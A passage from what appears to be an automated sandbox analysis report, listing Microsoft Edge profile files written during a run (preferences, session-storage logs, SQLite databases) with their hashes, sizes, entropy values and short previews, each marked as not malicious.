                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f3d29881-173f-4d7b-9f8f-9c2da715bdeb.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                  MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                  SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                  SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                  SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7766998781393047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtiuWkKcwF11DM/FAf4ADfzO7L0rqqV1K:LLiuW9LFPY/Wf4ADLo0rqq2
                                                                                                                                                                                                                                                                                  MD5:F78DE6EABD094AFC0DC1CD98BF1042DC
                                                                                                                                                                                                                                                                                  SHA1:87336EA8606603FFC464C5FE23F2733EECAF4C35
                                                                                                                                                                                                                                                                                  SHA-256:D167071B19C4020D84F550A61A00E4F4C3510872DCD3642A260B489DAE3077AF
                                                                                                                                                                                                                                                                                  SHA-512:71892608267440271502151EDB50F9054F69288ABE1C74097737C6E3AC0750F28D668867B4C6560CEF300A86AE3FBDBA46FEB87E40A21978DD13B45D3FAE434E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF34269.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3733d.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3a886.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ff7f.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF34586.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF39f2f.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.627204731507878
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljljljljl:S85aEFljljljljljljljljljljljl
                                                                                                                                                                                                                                                                                  MD5:70EF71DD0FED6C14B2B6E149267A2C2A
                                                                                                                                                                                                                                                                                  SHA1:B8829EA9631CD5E0ABA87D81E71047EF5FA92F24
                                                                                                                                                                                                                                                                                  SHA-256:3530055A62DDC24A89DD97751AC9DB187D009EB8193A29A3636CAE2567D4A4CD
                                                                                                                                                                                                                                                                                  SHA-512:2ED43127BCD5443C4CD04A01F70DE06C50FCEF1F284EE4DFEC07E605133AA5CD6A1E197DBC0C6E73679AF491B976A7304E8D38D58C948CB55471399978470241
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.168168774095214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73TmDSSN+q2Pwkn23oH+TcwtrQMxIFUt8O3TGmZmw+O3TaVkwOwkn23oH+Tcwtrb:73T0Si+vYfYebCFUt8O3TGm/+O3TaV5J
                                                                                                                                                                                                                                                                                  MD5:AFEDC31C2C267EB37BF7FC7C85BA631F
                                                                                                                                                                                                                                                                                  SHA1:60029C2EB657EBB71213BFC23F99D8F16FB4545B
                                                                                                                                                                                                                                                                                  SHA-256:5446654B135D46B06BD71BB2E799DD9BE8D1077F975649A3B44BDCF6CFB2EA37
                                                                                                                                                                                                                                                                                  SHA-512:935775B5449E2B9BA7138CC769248D31864BBB20E04312EA847C1E612625DD364EE0FE9A2954302CEF8BDD28DB8E042311B28EDD8CEDCF3DFCB5485A4892C6EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.688 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:41:29.689 1f7c Recovering log #3.2024/12/10-12:41:29.697 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.168168774095214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73TmDSSN+q2Pwkn23oH+TcwtrQMxIFUt8O3TGmZmw+O3TaVkwOwkn23oH+Tcwtrb:73T0Si+vYfYebCFUt8O3TGm/+O3TaV5J
                                                                                                                                                                                                                                                                                  MD5:AFEDC31C2C267EB37BF7FC7C85BA631F
                                                                                                                                                                                                                                                                                  SHA1:60029C2EB657EBB71213BFC23F99D8F16FB4545B
                                                                                                                                                                                                                                                                                  SHA-256:5446654B135D46B06BD71BB2E799DD9BE8D1077F975649A3B44BDCF6CFB2EA37
                                                                                                                                                                                                                                                                                  SHA-512:935775B5449E2B9BA7138CC769248D31864BBB20E04312EA847C1E612625DD364EE0FE9A2954302CEF8BDD28DB8E042311B28EDD8CEDCF3DFCB5485A4892C6EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.688 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:41:29.689 1f7c Recovering log #3.2024/12/10-12:41:29.697 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

